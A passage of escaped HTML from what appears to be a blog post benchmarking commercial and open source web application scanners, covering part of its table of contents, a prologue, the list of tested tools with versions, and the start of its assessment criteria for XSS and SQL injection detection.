none;&quot;&gt;19&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;29. Appendix A – Assessing Web Application  Scanners&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;20&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;30. Appendix B – A List of Tools Not  Included In the Test&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;21&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;31. Appendix C – WAVSEP Scan Logs&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;25&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;32. Appendix D – Scanners with Abnormal  Behavior&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;25&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025789&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;1. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Prologue&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I&#39;ve always been curious about it… from the first moment I executed a commercial scanner, almost seven years ago, to the day I started performing this research. Although manual penetration testing has always been the main focus of the test, most of us use automated tools to easily detect &quot;low hanging fruit&quot; exposures, increase the coverage when testing large scale applications in limited timeframes and even to double check locations that were manually tested. The questions always pops up, in every penetration test in which these tools are used…&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&quot;Is it any good?&quot;, &quot;Is it better than…&quot; and &quot;Can I rely on it to…&quot; are questions that every pen-tester asks himself whenever he hits the scan button.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Well, curiosity is a strange beast… it can drive you to wander and search, consume all your time in a search for obscure solutions.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So recently, because of curiosity, I decided that I want to find out for myself, and invest whatever resources necessary to solve this mystery once and for all.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although I can hardly state that all my questions were answered, I can definitely sate your curiosity for the moment, by sharing insights, interesting facts, useful information and even some surprises, all derived from my latest research which is focused on the subject of commercial &amp;amp; open source web application scanners.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;This research covers the latest versions of &lt;b&gt;12&lt;/b&gt; commercial web application scanners and &lt;b&gt;48&lt;/b&gt; free &amp;amp; open source web application scanners, while comparing the following aspects of these tools:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Number &amp;amp; Type of Vulnerability Detection Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;SQL Injection Detection Accuracy&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Reflected Cross Site Scripting&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Detection Accuracy&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;General &amp;amp; Special Scanning Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although my previous research included similar information, I regretted one thing after it was published; I did not present the information in a format that was useful to the common reader. In fact, as I found out later, many readers skipped the actual content, and focused on sections of the article that were actually a side effect of the main research.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As a result, the following article will focus on presenting the information in a &lt;b&gt;simple comprehendible graphical format&lt;/b&gt;, while still providing the detailed research information to those interested… and there&#39;s &lt;b&gt;&lt;i&gt;a lot of new information to be shared&lt;/i&gt;&lt;/b&gt; – knowledge that can aid pen-testers in choosing the right tools, managers in budget related decisions, and visionaries, in properly reading the map;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;But&lt;/b&gt; before you read the statistics and insights presented in this report, and reach a conclusion as to which tool is the &quot;best&quot;, it is crucial that you read &lt;b&gt;&lt;u&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;‎&lt;/span&gt;Appendix A - Section 29&lt;/u&gt;&lt;/b&gt;, which explains the complexity of assessing the overall quality of web application scanners… &amp;nbsp;As you&#39;re about to find out, this question cannot be answered so easily… at least not yet.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;…&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So without any further delay, let&#39;s focus on the information you seek, and discuss the insights and conclusions later.&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025790&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;2. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;List of Tested Web Application Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;u&gt;The following &lt;b&gt;commercial&lt;/b&gt; scanners were &lt;b&gt;included&lt;/b&gt; in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;IBM Rational AppScan &lt;/i&gt;&lt;/b&gt;v8.0.03 - iFix Version (IBM)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;WebInspect&lt;/i&gt;&lt;/b&gt; v9.10.78.0, SecureBase 4.05.99 (HP)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Hailstorm&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Professional&lt;/i&gt;&lt;/b&gt; v6.5-5267(Cenzic)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Acunetix WVS&lt;/i&gt;&lt;/b&gt; v7.0-20110608 (Acunetix)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;NTOSpider&lt;/i&gt;&lt;/b&gt; v 5.4.098 (NT Objectives)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Netsparker&lt;/i&gt;&lt;/b&gt; v2.0.0.0 (Mavituna Security)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Burp Suite&lt;/i&gt;&lt;/b&gt; v1.3.09 (Portswigger)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Sandcat &lt;/i&gt;&lt;/b&gt;v4.2.4.0 (Syhunt)&lt;b&gt;&lt;i&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;ParosPro&lt;/i&gt;&lt;/b&gt; v1.9.12 (Milescan)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;JSky&lt;/i&gt;&lt;/b&gt; v3.5.1-905 (NoSec)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;WebCruiser&lt;/i&gt;&lt;/b&gt; v2.5.0 EE (Janus Security)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Nessus&lt;/i&gt;&lt;/b&gt; v4.41-15078 (Tenable Network Security) – Only the Web Application Scanning Features&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;u&gt;The following &lt;b&gt;new&lt;/b&gt; &lt;b&gt;free &amp;amp; open source&lt;/b&gt; scanners were &lt;b&gt;included&lt;/b&gt; in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;VEGA&lt;/i&gt;&lt;/b&gt; 1.0 beta (Subgraph), &lt;b&gt;&lt;i&gt;Safe3WVS&lt;/i&gt;&lt;/b&gt; v9.2 FE (Safe3 Network Center), &lt;b&gt;&lt;i&gt;N-Stalker 2012&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Free Edition&lt;/i&gt;&lt;/b&gt; v7.1.1.106 (N-Stalker), &lt;b&gt;&lt;i&gt;DSSS (Damn Simple SQLi Scanner)&lt;/i&gt;&lt;/b&gt; v0.1h, &lt;b&gt;&lt;i&gt;SandcatCS&lt;/i&gt;&lt;/b&gt; v4.2.3.0&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;u&gt;The updated versions of the following &lt;b&gt;free &amp;amp; open source&lt;/b&gt; scanners were &lt;b&gt;re-tested&lt;/b&gt; in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Zed Attack Proxy (ZAP) &lt;/i&gt;&lt;/b&gt;v1.3.0, &lt;b&gt;&lt;i&gt;sqlmap&lt;/i&gt;&lt;/b&gt; v0.9-rev4209 (SVN), &lt;b&gt;&lt;i&gt;W3AF&lt;/i&gt;&lt;/b&gt; 1.1-rev4350 (SVN), &lt;b&gt;&lt;i&gt;Watobo&lt;/i&gt;&lt;/b&gt; v0.9.7-rev544, &lt;b&gt;&lt;i&gt;Acunetix Free Edition&lt;/i&gt;&lt;/b&gt; v7.0-20110711, &lt;b&gt;&lt;i&gt;Netsparker Community Edition&lt;/i&gt;&lt;/b&gt; v1.7.2.13, &lt;b&gt;&lt;i&gt;WebSecurify&lt;/i&gt;&lt;/b&gt; v0.8, &lt;b&gt;&lt;i&gt;WebCruiser&lt;/i&gt;&lt;/b&gt; v2.4.2 FE (corrections), &lt;b&gt;&lt;i&gt;arachni&lt;/i&gt;&lt;/b&gt; v0.2.4 / v0.3, &lt;b&gt;&lt;i&gt;XSSer&lt;/i&gt;&lt;/b&gt; v1.5-1, &lt;b&gt;&lt;i&gt;Skipfish&lt;/i&gt;&lt;/b&gt; 2.02b, &lt;b&gt;&lt;i&gt;aidSQL&lt;/i&gt;&lt;/b&gt; 02062011&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;u&gt;The results were compared to those of unmaintained scanners tested in the original benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Andiparos&lt;/i&gt;&lt;/b&gt; v1.0.6, &lt;b&gt;&lt;i&gt;ProxyStrike&lt;/i&gt;&lt;/b&gt; v2.2,&lt;b&gt;&lt;i&gt; Wapiti&lt;/i&gt;&lt;/b&gt; v2.2.1, &lt;b&gt;&lt;i&gt;Paros Proxy&lt;/i&gt;&lt;/b&gt; v3.2.13, &lt;b&gt;&lt;i&gt;PowerFuzzer&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;Grendel Scan&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;Oedipus&lt;/i&gt;&lt;/b&gt; v1.8.1, &lt;b&gt;&lt;i&gt;Scrawler&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;Sandcat Free Edition&lt;/i&gt;&lt;/b&gt; v4.0.0.1,&lt;b&gt;&lt;i&gt; JSKY Free Edition&lt;/i&gt;&lt;/b&gt; v1.0.0,&lt;b&gt;&lt;i&gt; N-Stalker 2009 Free Edition&lt;/i&gt;&lt;/b&gt; v7.0.0.223,&lt;b&gt;&lt;i&gt; UWSS (Uber Web Security Scanner)&lt;/i&gt;&lt;/b&gt; v0.0.2,&lt;b&gt;&lt;i&gt; Grabber&lt;/i&gt;&lt;/b&gt; v0.1, &lt;b&gt;&lt;i&gt;WebScarab&lt;/i&gt;&lt;/b&gt; v20100820,&lt;b&gt;&lt;i&gt; Mini MySqlat0r&lt;/i&gt;&lt;/b&gt; v0.5, &lt;b&gt;&lt;i&gt;WSTool&lt;/i&gt;&lt;/b&gt; v0.14001,&lt;b&gt;&lt;i&gt; crawlfish&lt;/i&gt;&lt;/b&gt; v0.92, &lt;b&gt;&lt;i&gt;Gamja&lt;/i&gt;&lt;/b&gt; v1.6, &lt;b&gt;&lt;i&gt;iScan&lt;/i&gt;&lt;/b&gt; v0.1, &lt;b&gt;&lt;i&gt;LoverBoy&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;openAcunetix&lt;/i&gt;&lt;/b&gt; v0.1, &lt;b&gt;&lt;i&gt;ScreamingCSS&lt;/i&gt;&lt;/b&gt; v1.02, &lt;b&gt;&lt;i&gt;Secubat&lt;/i&gt;&lt;/b&gt; v0.5, &lt;b&gt;&lt;i&gt;SQID (SQL Injection Digger)&lt;/i&gt;&lt;/b&gt; v0.3, &lt;b&gt;&lt;i&gt;SQLiX&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;VulnDetector&lt;/i&gt;&lt;/b&gt; v0.0.2, &lt;b&gt;&lt;i&gt;Web Injection Scanner&lt;/i&gt;&lt;/b&gt; &amp;nbsp;(WIS) v0.4, &lt;b&gt;&lt;i&gt;Xcobra&lt;/i&gt;&lt;/b&gt; v0.2, &lt;b&gt;&lt;i&gt;XSSploit&lt;/i&gt;&lt;/b&gt; v0.5, &lt;b&gt;&lt;i&gt;XSSS&lt;/i&gt;&lt;/b&gt; v0.40, &lt;b&gt;&lt;i&gt;Priamos&lt;/i&gt;&lt;/b&gt; v1.0 &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For the full list of commercial &amp;amp; open source tools that were &lt;b&gt;not&lt;/b&gt; tested in this benchmark, refer to &lt;b&gt;&lt;u&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;‎&lt;/span&gt;Appendix B - Section 30&lt;/u&gt;&lt;/b&gt;.&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025791&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;3. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Overview &amp;amp; Assessment Criteria&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The benchmark focused on testing commercial &amp;amp; open source tools that are able to &lt;b&gt;detect&lt;/b&gt; (and not necessarily exploit) security vulnerabilities on a wide range of URLs, and thus, each tool tested was required to support the following features:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to detect Reflected XSS and/or SQL Injection vulnerabilities.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to scan multiple URLs at once (using either a crawler/spider feature, URL/Log file parsing feature or a built-in proxy).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span 